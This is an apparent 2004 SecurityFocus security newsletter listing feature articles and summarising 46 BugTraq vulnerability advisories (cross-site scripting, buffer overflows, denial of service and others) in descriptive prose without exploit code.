ALERT: How Hackers Use LDAP Injection to Steal Your Data and Bypass
Authentication
It's as simple as placing additional LDAP query commands into a Web form
input box, giving hackers complete access to all your backend systems!
Firewalls and IDS will not stop such attacks because LDAP Injections are
seen as valid data.
Download this *FREE* white paper from SPI Dynamics for a complete guide to
protection!
I. FRONT AND CENTER
1. Deploying Network Access Quarantine Control (part 1 of 2)
2. Data Driven Attacks Using HTTP Tunneling
II. BUGTRAQ SUMMARY
1. Webcam Corp Webcam Watchdog sresult.exe Cross-Site Scripting...
2. MailEnable Content-Length Denial Of Service Vulnerability
3. Gnu Transport Layer Security Library X.509 Certificate Verif...
4. U.S. Robotics USR808054 Wireless Access Point Web Administra...
5. IBM Tivoli Directory Server LDACGI Directory Traversal Vulne...
6. Webbsyte Chat Denial Of Service Vulnerability
7. Mozilla and Netscape SOAPParameter Integer Overflow Vulnerab...
8. Sun Java Runtime Environment Remote XSLT Privilege Escalatio...
9. Horde IMP HTML+TIME HTML Injection Vulnerability
10. WHM AutoPilot Clogin.PHP Username/Password Information Discl...
11. BreakCalendar Multiple Remote Vulnerabilities
12. ripMIME MIME Attachment Decoding Weakness
13. StackDefender ObjectAttributes Invalid Pointer Dereference D...
14. PuTTY Modpow Integer Handling Memory Corruption Vulnerabilit...
15. StackDefender BaseAddress Invalid Pointer Dereference Denial...
16. Linux Kernel File 64-Bit Offset Pointer Handling Kernel Memo...
17. Pete Stein GoScript Remote Command Execution Vulnerability
18. Juniper Networks NetScreen SSHv1 Denial Of Service Vulnerabi...
19. DGen Emulator Symbolic Link Vulnerability
20. eNdonesia Search Form Cross-Site Scripting Vulnerability
21. LibPNG Graphics Library Multiple Remote Vulnerabilities
22. Jetbox One Plaintext Password Storage Vulnerability
23. Jetbox One Remote Server-Side Script Execution Vulnerability
24. WackoWiki TextSearch Cross-Site Scripting Vulnerability
25. PHP-Nuke Delete God Admin Access Control Bypass Vulnerabilit...
26. Acme thttpd Directory Traversal Vulnerability
27. Multiple Free Web Chat Denial Of Service Vulnerabilities
28. Gnome VFS 'extfs' Scripts Undisclosed Vulnerability
29. Gaim Multiple Unspecified MSN Protocol Buffer Overflow Vulne...
30. LILO gfxboot Plaintext Password Display Vulnerability
31. YaST2 Utility Library File Verification Shell Code Injection...
32. phpBB Fetch All SQL Injection Vulnerability
33. Neon WebDAV Client Library Unspecified Vulnerability
34. PSCP Modpow Base Integer Handling Buffer Overrun Vulnerabili...
35. Oracle Multiple Unspecified Vulnerabilities
36. LibPNG Graphics Library Unspecified Remote Buffer Overflow V...
37. Opera Remote Location Object Cross-Domain Scripting Vulnerab...
38. Mozilla Browser Input Type HTML Tag Unauthorized Access Vuln...
39. Mozilla Browser/Thunderbird SendUIDL POP3 Message Handling R...
40. Mozilla Browser Non-FQDN SSL Certificate Spoofing Vulnerabil...
41. CVSTrac filediff Remote Command Execution Vulnerability
42. Microsoft Internet Explorer mms Protocol Handler Executable ...
43. Mozilla SSL Redirect Spoofing Vulnerability
44. Thomson SpeedTouch Home ADSL Modem Predictable Initial TCP S...
45. GNU Info Follow XRef Buffer Overrun Vulnerability
46. phpBB Login.PHP Cross-Site Scripting Vulnerability
III. SECURITYFOCUS NEWS ARTICLES
1. Wardriving guilty plea in Lowe's wi-fi case
2. Ashcroft wins Internet wiretap system
3. ATM keypads get a security boost
4. Phishermen attack on a viral scale
5. Price isn't right for new Bagle variant
6. Phone spam misery looms Stateside
IV. SECURITYFOCUS TOP 6 TOOLS
1. MonitorMagic - Server & Network Monitor 6.0
2. CipherPack Pro 3.2
3. Savungan - Stateful Inspection Firewall for Windows with FUL... 2.0
4. SSlDigger 1.0
5. DiskLogon 1.0.17.112
6. UndeleteSMS 1.0
V. SECURITYJOBS LIST SUMMARY
1. [SJ-JOB] Sr. Security Analyst, Busto Arsizio (VA), I... (Thread)
2. [SJ-JOB] Jr. Security Analyst, Busto Arsizio (VA), I... (Thread)
3. [SJ-JOB] CHECK Team Leader, London, GB (Thread)
4. [SJ-JOB] Account Manager, San Francisco, US (Thread)
5. [SJ-JOB] Sr. Security Analyst, Clearwater, US (Thread)
6. [SJ-JOB] Chief Security Strategist, Dallas, US (Thread)
7. [SJ-JOB] Security Consultant, Riyadh, SA (Thread)
8. [SJ-JOB] Quality Assurance, Santa Barbara, US (Thread)
9. [SJ-JOB] Security Product Manager, San Jose, US (Thread)
10. [SJ-JOB] Sr. Security Engineer, Boston, US (Thread)
11. [SJ-JOB] Evangelist, San Jose, US (Thread)
12. [SJ-JOB] Security Consultant, Indianapolis, US (Thread)
13. [SJ-JOB] Account Manager, New York, US (Thread)
14. [SJ-JOB] Security Consultant, Albany, NY, US (Thread)
15. [SJ-JOB] Security Consultant, San Francisco, US (Thread)
16. [SJ-JOB] Security Engineer, Eatontown, US (Thread)
17. [SJ-JOB] Security Consultant, Houston, US (Thread)
18. [SJ-JOB] Security Engineer, Washington, DC, US (Thread)
19. [SJ-JOB] Security Auditor, Miami, US (Thread)
20. [SJ-JOB] Security Engineer, New York (and NJ Metro A... (Thread)
21. [SJ-JOB] Management, Irvine, US (Thread)
22. [SJ-JOB] Security Consultant, Albany, US (Thread)
23. [SJ-JOB] Sales Engineer, Atlanta, US (Thread)
24. [SJ-JOB] Security Consultant, New York, US (Thread)
25. [SJ-JOB] Account Manager, Chicago, US (Thread)
26. [SJ-JOB] Sr. Security Engineer, Palo Alto, US (Thread)
VI. INCIDENTS LIST SUMMARY
1. New Mass Mailer Virus (Thread)
2. NDR +Hotmail & MSN (Thread)
3. distributed spamming/scamming scheme? (Thread)
4. Anyone else seeing SSH scans? (Thread)
5. Is this some type of scan (Thread)
VII. VULN-DEV RESEARCH LIST SUMMARY
NO NEW POSTS FOR THE WEEK 2004-08-03 to 2004-08-10.
VIII. MICROSOFT FOCUS LIST SUMMARY
1. most active attack type (Thread)
2. SecurityFocus Microsoft Newsletter #200 (Thread)
IX. SUN FOCUS LIST SUMMARY
1. Password recovery (Thread)
2. How to Restrict a user, not a root, Login to the Con... (Thread)
3. trouble setting up routing (Thread)
4. ipv6 questions + solaris 9 (Thread)
5. syslog logging (Thread)
X. LINUX FOCUS LIST SUMMARY
1. can Hopster traffic be blocked? (Thread)
XI. UNSUBSCRIBE INSTRUCTIONS
XII. SPONSOR INFORMATION
I. FRONT AND CENTER
-------------------
1. Deploying Network Access Quarantine Control (part 1 of 2)
By Jonathan Hassell
This article discusses Network Access Quarantine Control with Windows
Server 2003, which allows administrators to quarantine mobile users before
giving them full network access, by first ensuring these machines are
up-to-date according to a baseline security model.
http://www.securityfocus.com/infocus/1794
2. Data Driven Attacks Using HTTP Tunneling
By Ido Dubrawsky
In this article we will look at a means to bypass the access control
restrictions of a company's router or firewall. This information is
intended to provide help for those who are legitimately testing the
security of a network (whether they are in-house expertise or outside
consultants).
http://www.securityfocus.com/infocus/1793
II. BUGTRAQ SUMMARY
-------------------
1. Webcam Corp Webcam Watchdog sresult.exe Cross-Site Scripting...
BugTraq ID: 10837
Remote: Yes
Date Published: Aug 02 2004
Relevant URL: http://www.securityfocus.com/bid/10837
Summary:
Reportedly, Webcam Corp Webcam Watchdog is affected by a remote cross-site scripting vulnerability in the sresult.exe binary. This issue is due to a failure of the application to properly sanitize user-supplied input prior to including it in dynamically generated web content.
As a result of this vulnerability, it is possible for a remote attacker to create a malicious link containing script code that will be executed in the browser of a legitimate user. Specifically, the attacker can pass malicious HTML code as a value for the affected URI parameter supplied to 'sresult.exe'. All code will be executed within the context of the website running the vulnerable software.
2. MailEnable Content-Length Denial Of Service Vulnerability
BugTraq ID: 10838
Remote: Yes
Date Published: Aug 02 2004
Relevant URL: http://www.securityfocus.com/bid/10838
Summary:
MailEnable is reported prone to a remote denial of service vulnerability. This vulnerability is reported to exist in the MailEnable HTTP header parsing code.
When reading a large content-length header field from an HTTP request, the operation overflows a fixed size memory buffer and the HTTP service will reportedly crash.
The vulnerability can be exploited to crash the affected HTTP service, denying service to legitimate users. The possibility to execute arbitrary code may also be present.
3. Gnu Transport Layer Security Library X.509 Certificate Verif...
BugTraq ID: 10839
Remote: Yes
Date Published: Aug 02 2004
Relevant URL: http://www.securityfocus.com/bid/10839
Summary:
Reportedly, Gnu Transport Layer Security Library (GnuTLS) is affected by an X.509 certificate verification denial of service vulnerability. This issue is due to a design error that causes the application to attempt to verify invalid X.509 certificates.
This issue would allow an attacker to cause the affected application to consume CPU resources and hang while attempted verification takes place, denying service to legitimate users.
4. U.S. Robotics USR808054 Wireless Access Point Web Administra...
BugTraq ID: 10840
Remote: Yes
Date Published: Aug 02 2004
Relevant URL: http://www.securityfocus.com/bid/10840
Summary:
The USR808054 wireless access point is reported to contain a denial of service vulnerability in its embedded web server.
When malicious requests are received by the device, it will reportedly crash, denying service to legitimate users of the access point.
This issue can be exploited by anybody with network connectivity to the administration HTTP server; no authentication is required.
Version 1.21h of the device was found to be vulnerable, but other versions are also likely affected. Due to the practice of code-reuse in companies, it is also possible that other devices and products have this same flaw.
This BID may also be related to BID 6994, but this has not been confirmed.
5. IBM Tivoli Directory Server LDACGI Directory Traversal Vulne...
BugTraq ID: 10841
Remote: Yes
Date Published: Aug 02 2004
Relevant URL: http://www.securityfocus.com/bid/10841
Summary:
IBM Tivoli Directory Server is reported to contain a directory traversal vulnerability in its web front-end application.
This issue presents itself due to insufficient sanitization of user-supplied data.
This issue allows remote attackers to view potentially sensitive files on the server that are accessible to the 'ldap' user. This may aid an attacker in conducting further attacks against the vulnerable computer.
Versions 3.2.2 and 4.1 are reported vulnerable.
6. Webbsyte Chat Denial Of Service Vulnerability
BugTraq ID: 10842
Remote: Yes
Date Published: Aug 02 2004
Relevant URL: http://www.securityfocus.com/bid/10842
Summary:
Webbsyte Chat is reported susceptible to a denial of service vulnerability.
This issue presents itself when multiple simultaneous TCP connections are made to the chat server. When this occurs, the application will reportedly crash, denying service to legitimate users.
Version 0.9 was reported vulnerable. The application is not supported any longer, so it is unlikely that a fix will become available.
7. Mozilla and Netscape SOAPParameter Integer Overflow Vulnerab...
BugTraq ID: 10843
Remote: Yes
Date Published: Aug 02 2004
Relevant URL: http://www.securityfocus.com/bid/10843
Summary:
It is reported that Mozilla and Netscape contain an integer overflow vulnerability in the SOAPParameter object constructor. This overflow may result in the corruption of critical heap memory structures, leading to possible remote code execution.
An attacker can exploit this issue by crafting a malicious web page and having unsuspecting users view the page in a vulnerable version of Mozilla or Netscape.
Netscape 7.0, 7.1, and versions of Mozilla prior to 1.7.1 are known to be vulnerable to this issue. Users of affected versions of Netscape are urged to switch to Mozilla 1.7.1 or later, as new versions of Netscape are not likely to appear.
8. Sun Java Runtime Environment Remote XSLT Privilege Escalatio...
BugTraq ID: 10844
Remote: Yes
Date Published: Aug 03 2004
Relevant URL: http://www.securityfocus.com/bid/10844
Summary:
It has been reported that the Sun Java Runtime Environment is affected by an access validation vulnerability within the XSLT processor.
An attacker might exploit this issue to allow an untrusted applet or application to read data from a trusted applet or application that is running within the same virtual machine. It has also been reported that this issue may facilitate privilege escalation.
9. Horde IMP HTML+TIME HTML Injection Vulnerability
BugTraq ID: 10845
Remote: Yes
Date Published: Aug 03 2004
Relevant URL: http://www.securityfocus.com/bid/10845
Summary:
Reportedly Horde IMP is affected by an HTML injection vulnerability due to insufficient sanitization of HTML+TIME script.
An attacker can exploit this issue to gain access to an unsuspecting user's cookie-based authentication credentials; disclosure of personal email is possible. Other attacks are also possible.
10. WHM AutoPilot Clogin.PHP Username/Password Information Discl...
BugTraq ID: 10846
Remote: Yes
Date Published: Aug 03 2004
Relevant URL: http://www.securityfocus.com/bid/10846
Summary:
WHM AutoPilot is reported prone to an information disclosure vulnerability. The issue is reported to exist due to a vulnerability in the functionality provided to permit an administrator to log on to WHM AutoPilot as another user.
It is reported that this vulnerability may be exploited by a remote attacker to disclose WHM AutoPilot usernames and passwords.
11. BreakCalendar Multiple Remote Vulnerabilities
BugTraq ID: 10847
Remote: Yes
Date Published: Aug 03 2004
Relevant URL: http://www.securityfocus.com/bid/10847
Summary:
Reportedly BreakCalendar is affected by multiple remote vulnerabilities. These issues are due to a failure to sanitize user-supplied input.
An attacker could leverage these issues to conduct cross-site scripting attacks and to perform actions facilitated by the 'add event' and 'edit/remove event' forms.
12. ripMIME MIME Attachment Decoding Weakness
BugTraq ID: 10848
Remote: Yes
Date Published: Aug 03 2004
Relevant URL: http://www.securityfocus.com/bid/10848
Summary:
It is reported that a weakness exists in ripMIME's decoding routine.
If ripMIME is being used in conjunction with a virus scanner or other similar type of application, this weakness has the effect of not passing the attachment to the scanning engine. This means that the attachments will bypass the scanning process.
By bypassing the scanning process, the message may then be passed on to an end user while still containing a virus or other malicious code that should have been blocked by the filter.
Attackers may exploit this weakness by forming malicious content designed to pass through filtering software. This content is designed to be decoded by the end user's MUA. Some MUAs may decode the MIME attachments even though they are formed incorrectly, allowing the malicious content to be delivered.
Version 1.3.2.3 has been released which fixes this weakness.
13. StackDefender ObjectAttributes Invalid Pointer Dereference D...
BugTraq ID: 10849
Remote: Yes
Date Published: Aug 04 2004
Relevant URL: http://www.securityfocus.com/bid/10849
Summary:
StackDefender is prone to a vulnerability that may permit attackers to crash the computer. This issue may be triggered if the program attempts to dereference an invalid pointer.
To exploit this issue, the attacker must be able to cause memory corruption on the host computer, such as through exploitation of a buffer overflow in another application. This will force the software to attempt to block the memory corruption exploit attempt and in turn expose this vulnerability.
This issue is known to affect StackDefender 1.10.
14. PuTTY Modpow Integer Handling Memory Corruption Vulnerabilit...
BugTraq ID: 10850
Remote: Yes
Date Published: Aug 04 2004
Relevant URL: http://www.securityfocus.com/bid/10850
Summary:
Reportedly PuTTY is affected by a remote, pre-authentication code execution vulnerability.
An attacker might leverage this issue to execute arbitrary code on an affected system. As this issue is exploitable before any authorization and before the host key is verified, any remote attacker can exploit this to gain unauthorized access to a vulnerable computer with the privileges of the user that started the affected application.
15. StackDefender BaseAddress Invalid Pointer Dereference Denial...
BugTraq ID: 10851
Remote: Yes
Date Published: Aug 04 2004
Relevant URL: http://www.securityfocus.com/bid/10851
Summary:
StackDefender is prone to a vulnerability that may permit attackers to crash the computer. This issue may be triggered if the program attempts to dereference an invalid pointer.
To exploit this issue, the attacker must be able to cause memory corruption on the host computer, such as through exploitation of a buffer overflow in another application. This will force the software to attempt to block the memory corruption exploit attempt and in turn expose this vulnerability.
This issue is known to affect StackDefender 2.0.
16. Linux Kernel File 64-Bit Offset Pointer Handling Kernel Memo...
BugTraq ID: 10852
Remote: No
Date Published: Aug 04 2004
Relevant URL: http://www.securityfocus.com/bid/10852
Summary:
A vulnerability in the Linux kernel in the 64-bit file offset handling code may allow malicious users to read kernel memory. This issue is due to a design error that causes the affected code to fail to properly validate file pointers.
An attacker may leverage this issue to read arbitrary Linux kernel memory. This could allow an attacker to read sensitive data such as cached passwords. This issue will certainly aid in further attacks against the affected computer.
It has been reported that the Linux 2.6.X kernel, although still vulnerable, might not be exploitable. This BID will be updated when more information becomes available.
17. Pete Stein GoScript Remote Command Execution Vulnerability
BugTraq ID: 10853
Remote: Yes
Date Published: Aug 04 2004
Relevant URL: http://www.securityfocus.com/bid/10853
Summary:
Pete Stein GoScript is prone to a remote command execution vulnerability.
This may allow remote attackers to perform unauthorized actions on a victim computer in the context of the hosting Web server.
18. Juniper Networks NetScreen SSHv1 Denial Of Service Vulnerabi...
BugTraq ID: 10854
Remote: Yes
Date Published: Aug 04 2004
Relevant URL: http://www.securityfocus.com/bid/10854
Summary:
Juniper Networks NetScreen firewalls configured to run the SSHv1 service are reported prone to a denial of service vulnerability. It is reported that the vulnerability may be triggered by a remote attacker, prior to any form of authentication.
19. DGen Emulator Symbolic Link Vulnerability
BugTraq ID: 10855
Remote: No
Date Published: Aug 04 2004
Relevant URL: http://www.securityfocus.com/bid/10855
Summary:
DGen is reportedly affected by a symbolic link vulnerability. This issue is due to a design error that fails to properly verify files prior to writing to them.
Successful exploitation of this issue will allow a local attacker to cause the affected application to overwrite arbitrary files with the privileges of the user that invoked the affected application. Reportedly this issue could be leveraged to facilitate privilege escalation.
20. eNdonesia Search Form Cross-Site Scripting Vulnerability
BugTraq ID: 10856
Remote: Yes
Date Published: Aug 04 2004
Relevant URL: http://www.securityfocus.com/bid/10856
Summary:
It is reported that eNdonesia is susceptible to a cross-site scripting vulnerability. This issue is due to a failure of the application to properly sanitize user-supplied input prior to including it in dynamically generated web content.
As a result of this vulnerability, it is possible for a remote attacker to create a malicious link containing script code that will be executed in the browser of a legitimate user. Specifically the attacker can pass malicious HTML code as a value for the affected URI parameter supplied to 'mod.php'. All code will be executed within the context of the website running the vulnerable software.
This may allow for theft of cookie-based authentication credentials and other attacks.
Version 8.3 of the software is reported vulnerable. Other versions may also be affected.
21. LibPNG Graphics Library Multiple Remote Vulnerabilities
BugTraq ID: 10857
Remote: Yes
Date Published: Aug 04 2004
Relevant URL: http://www.securityfocus.com/bid/10857
Summary:
The libpng graphics library is reported prone to multiple vulnerabilities. The following issues are reported:
It is reported that a stack-based buffer overrun vulnerability exists in the libpng library (CAN-2004-0597).
A remote attacker may exploit this condition, by supplying a malicious image to an unsuspecting user. When this image is viewed, the vulnerability may be triggered resulting in code execution occurring in the context of the user that viewed the malicious image.
A denial of service vulnerability is also reported to affect libpng (CAN-2004-0598).
A remote attacker may exploit this condition, by supplying a malicious image to an unsuspecting user. When the malicious image is viewed, a NULL pointer dereference will occur resulting in a crash of the application that is linked to the vulnerable library.
Additionally several integer overrun vulnerabilities are reported to exist in png_handle_sPLT(), png_read_png() and other functions of libpng (CAN-2004-0599).
A remote attacker may exploit the integer-overrun conditions, by supplying a malicious image to an unsuspecting user. When the malicious image is viewed, an integer value may wrap, or be interpreted incorrectly resulting in a crash of the application that is linked to the vulnerable library, or may potentially result in arbitrary code execution.
This BID will be split into independent BIDs when further analysis of these vulnerabilities is complete.
22. Jetbox One Plaintext Password Storage Vulnerability
BugTraq ID: 10858
Remote: Yes
Date Published: Aug 04 2004
Relevant URL: http://www.securityfocus.com/bid/10858
Summary:
It is reported that Jetbox One is prone to a plaintext password storage vulnerability.
A malicious user may use the sensitive data available from this vulnerability to launch further attacks against a vulnerable system.
It should be noted that although this vulnerability has been reported to affect Jetbox One version 2.0.8, other versions might also be affected.
23. Jetbox One Remote Server-Side Script Execution Vulnerability
BugTraq ID: 10859
Remote: Yes
Date Published: Aug 04 2004
Relevant URL: http://www.securityfocus.com/bid/10859
Summary:
A vulnerability is reported to exist in Jetbox One that may allow a remote attacker to execute malicious scripts on a vulnerable system.
It is reported that an attacker may be able to place server side scripts in directories that could be accessed and executed later.
Successful exploitation of this issue may allow an attacker to execute malicious script code on a vulnerable server.
Version 2.0.8 is reported vulnerable to this issue. Other versions may also be affected.
24. WackoWiki TextSearch Cross-Site Scripting Vulnerability
BugTraq ID: 10860
Remote: Yes
Date Published: Aug 04 2004
Relevant URL: http://www.securityfocus.com/bid/10860
Summary:
It is reported that WackoWiki is susceptible to a cross-site scripting vulnerability in its textsearch form. This issue is due to a failure of the application to properly sanitize user-supplied input prior to including it in dynamically generated web content.
Exploitation of this vulnerability may allow for theft of cookie-based authentication credentials and other attacks.
25. PHP-Nuke Delete God Admin Access Control Bypass Vulnerabilit...
BugTraq ID: 10861
Remote: Yes
Date Published: Aug 04 2004
Relevant URL: http://www.securityfocus.com/bid/10861
Summary:
PHP-Nuke is reported prone to an access control bypass vulnerability.
Reports indicate that a PHP-Nuke superuser may bypass access controls and privilege restrictions, to delete the PHP-Nuke "God Admin" account. This may be accomplished by making a specially crafted request for the "admin.php" script.
26. Acme thttpd Directory Traversal Vulnerability
BugTraq ID: 10862
Remote: Yes
Date Published: Aug 04 2004
Relevant URL: http://www.securityfocus.com/bid/10862
Summary:
It is reported that thttpd is susceptible to a directory traversal vulnerability. This issue presents itself due to insufficient sanitization of user-supplied data. This issue only exists in the Windows port of the application, because that port does not correctly account for the platform-specific characteristics of file system access.
This issue may allow an attacker to retrieve arbitrary, potentially sensitive files from the affected host computer, as the user that the thttpd process is running as.
Version 2.07 beta 0.4 of thttpd, running on a Microsoft Windows platform, is reported vulnerable to this issue.
27. Multiple Free Web Chat Denial Of Service Vulnerabilities
BugTraq ID: 10863
Remote: Yes
Date Published: Aug 04 2004
Relevant URL: http://www.securityfocus.com/bid/10863
Summary:
Free Web Chat server is reported prone to multiple denial of service vulnerabilities. The following issues are reported:
The first denial of service vulnerability reported results from a lack of sufficient sanitization performed on username data. It is reported that a user with an empty (void) name may be added. This action will result in a NullPointerException.
A remote attacker may exploit this vulnerability to deny service to legitimate users.
The second denial of service vulnerability is reported to exist due to resource consumption. It is reported that the Free Web Chat server does not properly manage multiple connections that originate from the same location.
A remote attacker may exploit this vulnerability to deny service to legitimate users.
28. Gnome VFS 'extfs' Scripts Undisclosed Vulnerability
BugTraq ID: 10864
Remote: Yes
Date Published: Aug 04 2004
Relevant URL: http://www.securityfocus.com/bid/10864
Summary:
Gnome VFS's 'extfs' scripts are reported prone to an undisclosed vulnerability.
It is reported that a user that views specially crafted, attacker supplied URIs utilizing the 'extfs' VFS module may be able to execute arbitrary commands in the context of the user.
This BID will be updated as further information is disclosed.
29. Gaim Multiple Unspecified MSN Protocol Buffer Overflow Vulne...
BugTraq ID: 10865
Remote: Yes
Date Published: Aug 04 2004
Relevant URL: http://www.securityfocus.com/bid/10865
Summary:
It is reported that there are multiple unspecified buffer overflow vulnerabilities in the MSN protocol module in Gaim.
Due to a lack of details, further information is not available at the moment. This BID will be updated as more information becomes available.
30. LILO gfxboot Plaintext Password Display Vulnerability
BugTraq ID: 10866
Remote: No
Date Published: Aug 04 2004
Relevant URL: http://www.securityfocus.com/bid/10866
Summary:
Reportedly, gfxboot is affected by a plaintext password display vulnerability. This issue is due to a design error that fails to protect user passwords.
The problem reportedly results in the plaintext lilo boot password being displayed on screen as it is typed.
An attacker might leverage this issue to read the plaintext lilo boot password.
31. YaST2 Utility Library File Verification Shell Code Injection...
BugTraq ID: 10867
Remote: Yes
Date Published: Aug 04 2004
Relevant URL: http://www.securityfocus.com/bid/10867
Summary:
YaST2 utility library 'liby2util' is affected by a file verification shell code injection vulnerability. This issue is due to a design error that fails to properly validate files.
An attacker could leverage this issue to inject malicious shell code into a file name being transferred using the vulnerable utility. This might facilitate privilege escalation and unauthorized access.
32. phpBB Fetch All SQL Injection Vulnerability
BugTraq ID: 10868
Remote: Yes
Date Published: Aug 04 2004
Relevant URL: http://www.securityfocus.com/bid/10868
Summary:
It is reported that phpBB Fetch All is susceptible to an SQL injection vulnerability. This issue is due to a failure of the application to properly sanitize user-supplied input before using it in an SQL query.
The successful exploitation of this vulnerability depends on the implementation of the web application that includes phpBB Fetch All as a component. It may or may not be possible to effectively pass malicious SQL statements to the underlying function.
Successful exploitation could result in compromise of the application, disclosure or modification of data or may permit an attacker to exploit vulnerabilities in the underlying database implementation.
Versions prior to 2.0.12 are reported to be affected.
33. Neon WebDAV Client Library Unspecified Vulnerability
BugTraq ID: 10869
Remote: Yes
Date Published: Aug 04 2004
Relevant URL: http://www.securityfocus.com/bid/10869
Summary:
It is reported that Neon contains an unspecified vulnerability. The cause of this vulnerability is currently unknown.
Due to the nature of the library, it is likely that this is a remotely exploitable issue.
The effects and impact of this issue are currently unknown. This BID will be updated immediately when more information becomes available.
34. PSCP Modpow Base Integer Handling Buffer Overrun Vulnerabili...
BugTraq ID: 10870
Remote: Yes
Date Published: Aug 04 2004
Relevant URL: http://www.securityfocus.com/bid/10870
Summary:
PSCP is reported prone to a buffer overrun vulnerability.
An attacker might leverage this issue to execute arbitrary code on an affected system. As this issue is exploitable before any authorization and before the host key is verified, any remote attacker can exploit this to gain unauthorized access to a vulnerable computer with the privileges of the user that started the affected application.
35. Oracle Multiple Unspecified Vulnerabilities
BugTraq ID: 10871
Remote: Yes
Date Published: Aug 04 2004
Relevant URL: http://www.securityfocus.com/bid/10871
Summary:
It has been reported that multiple unspecified Oracle products contain multiple unspecified vulnerabilities.
The reported vulnerabilities include SQL injection, buffer overflows, and others.
Details about any of the vulnerabilities are unknown at this time. This BID will be updated and split into individual BIDs as further information is disclosed.
36. LibPNG Graphics Library Unspecified Remote Buffer Overflow V...
BugTraq ID: 10872
Remote: Yes
Date Published: Aug 05 2004
Relevant URL: http://www.securityfocus.com/bid/10872
Summary:
Reportedly LibPNG contains a buffer offset calculation error that may facilitate a buffer overflow vulnerability. This issue is due to a logical design error.
This vulnerability may allow an attacker to crash applications utilizing the library, or potentially allow code execution.
Please note that vulnerabilities previously outlined in this BID have been described in the LibPNG Graphics Library Multiple Remote Vulnerabilities outlined in BID 10857.
37. Opera Remote Location Object Cross-Domain Scripting Vulnerab...
BugTraq ID: 10873
Remote: Yes
Date Published: Aug 05 2004
Relevant URL: http://www.securityfocus.com/bid/10873
Summary:
Opera is affected by a remote location object cross-domain scripting vulnerability. This issue is due to a failure to properly validate methods that a user can access.
An attacker might leverage this issue to steal cookie-based authentication credentials, conduct phishing attacks, and carry out other attacks. Furthermore, provided there is an HTML script invoking 'location' methods local to a victim's computer (such as c:/winnt/help/ciadmin.htm in most Microsoft Windows installations), an attacker can exploit this issue to gain read access to directory contents, files, and email read using Opera's email utilities.
Although this issue is reported to affect versions 1.52 and 1.53 of the affected software, it is likely that earlier versions are also affected.
38. Mozilla Browser Input Type HTML Tag Unauthorized Access Vuln...
BugTraq ID: 10874
Remote: Yes
Date Published: Aug 05 2004
Relevant URL: http://www.securityfocus.com/bid/10874
Summary:
Mozilla browser is reportedly affected by an input type HTML tag unauthorized access vulnerability. This issue is due to an access validation error that allows access to arbitrary files on an unsuspecting user's system.
This issue will allow an attacker to obtain arbitrary files residing on the computer of an unsuspecting user that activates a malicious script.
39. Mozilla Browser/Thunderbird SendUIDL POP3 Message Handling R...
BugTraq ID: 10875
Remote: Yes
Date Published: Aug 05 2004
Relevant URL: http://www.securityfocus.com/bid/10875
Summary:
Mozilla and Mozilla Thunderbird are reported prone to a remote heap overflow vulnerability. The issue is reported to exist due to a lack of sufficient boundary checks performed on POP3 data handled by SendUidl().
An attacker-controlled POP3 mail server may exploit this condition by sending a specially crafted email message to the affected mail client. This will result in the corruption of heap-based memory.
40. Mozilla Browser Non-FQDN SSL Certificate Spoofing Vulnerabil...
BugTraq ID: 10876
Remote: Yes
Date Published: Aug 05 2004
Relevant URL: http://www.securityfocus.com/bid/10876
Summary:
Mozilla browser is reportedly vulnerable to an SSL certificate spoofing vulnerability in the 'cert_TestHostName()' function. This issue is due to a design error that fails to properly validate certified host names.
This issue would allow an attacker to spoof a trusted certificate from a third-party site, facilitating phishing-style attacks by luring an unsuspecting user into entering information on what appears to be a trusted site.
41. CVSTrac filediff Remote Command Execution Vulnerability
BugTraq ID: 10878
Remote: Yes
Date Published: Aug 05 2004
Relevant URL: http://www.securityfocus.com/bid/10878
Summary:
CVSTrac is affected by a remote command execution vulnerability in the 'filediff' functionality. This issue is due to an input validation error that allows for the appending of shell commands.
An attacker could leverage this issue to execute arbitrary shell commands on a vulnerable computer with the privileges of the web server process.
42. Microsoft Internet Explorer mms Protocol Handler Executable ...
BugTraq ID: 10879
Remote: Yes
Date Published: Aug 05 2004
Relevant URL: http://www.securityfocus.com/bid/10879
Summary:
A vulnerability has been reported to exist in Microsoft Internet Explorer that may allow remote attackers to pass arbitrary command line arguments to an application associated with the mms: URI protocol handler. Windows Media Player is the application normally associated with this URI protocol handler.
This vulnerability would permit an attacker to influence the invocation arguments of the executable and could result in the loss or compromise of various security properties. This may be exploited from a malicious Web page or possibly through HTML email.
It is not known if this issue is specific to the mms: URI protocol handler or if other URI protocol handlers on the system may be similarly affected. This vulnerability could be a general issue in Internet Explorer with many possible attack vectors, although there is not enough information available at this time to make this determination.
43. Mozilla SSL Redirect Spoofing Vulnerability
BugTraq ID: 10880
Remote: Yes
Date Published: Aug 05 2004
Relevant URL: http://www.securityfocus.com/bid/10880
Summary:
It is reported that Mozilla, and products derived from Mozilla are susceptible to an SSL redirect spoofing vulnerability.
By exploiting this vulnerability, an attacker can ensure that the victim's browser displays the SSL lock icon and shows the SSL certificate information of a legitimate site when the lock icon is clicked.
This vulnerability may aid in phishing-style attacks.
Mozilla prior to 1.7, Mozilla Firebird 0.7, Mozilla Firefox prior to 0.9, and Mozilla Thunderbird prior to 0.7 are all reported vulnerable.
44. Thomson SpeedTouch Home ADSL Modem Predictable Initial TCP S...
BugTraq ID: 10881
Remote: Yes
Date Published: Aug 05 2004
Relevant URL: http://www.securityfocus.com/bid/10881
Summary:
A vulnerability is reported to exist in the algorithms used by Thomson SpeedTouch Home ADSL Modem to generate initial TCP sequence numbers. The ability to predict TCP sequence numbers may allow a remote attacker to inject packets into a vulnerable data stream, for example the telnet service on the affected modem.
45. GNU Info Follow XRef Buffer Overrun Vulnerability
BugTraq ID: 10882
Remote: No
Date Published: Aug 06 2004
Relevant URL: http://www.securityfocus.com/bid/10882
Summary:
GNU Info is reported prone to a buffer overrun vulnerability. The vulnerability is reported to present itself due to a lack of boundary checks performed on argument data for the (f) follow xref Info command.
An attacker may exploit this vulnerability by crafting a malicious Info script that is sufficient to trigger the issue.
Although this vulnerability is reported to affect info version 4.7-2.1, other versions might also be affected.
46. phpBB Login.PHP Cross-Site Scripting Vulnerability
BugTraq ID: 10883
Remote: Yes
Date Published: Aug 06 2004
Relevant URL: http://www.securityfocus.com/bid/10883
Summary:
phpBB is affected by a cross-site scripting vulnerability in the 'login.php' script. This issue is due to a failure of the application to properly sanitize user-supplied URI input.
This can be exploited by constructing links that pass malicious strings through the affected URI parameter. If an unsuspecting user visits such a link, the malicious, externally created content supplied in the link will be rendered (or executed, in the case of script code) as part of the 'login.php' document and within the context of the vulnerable website (including the phpBB forum).
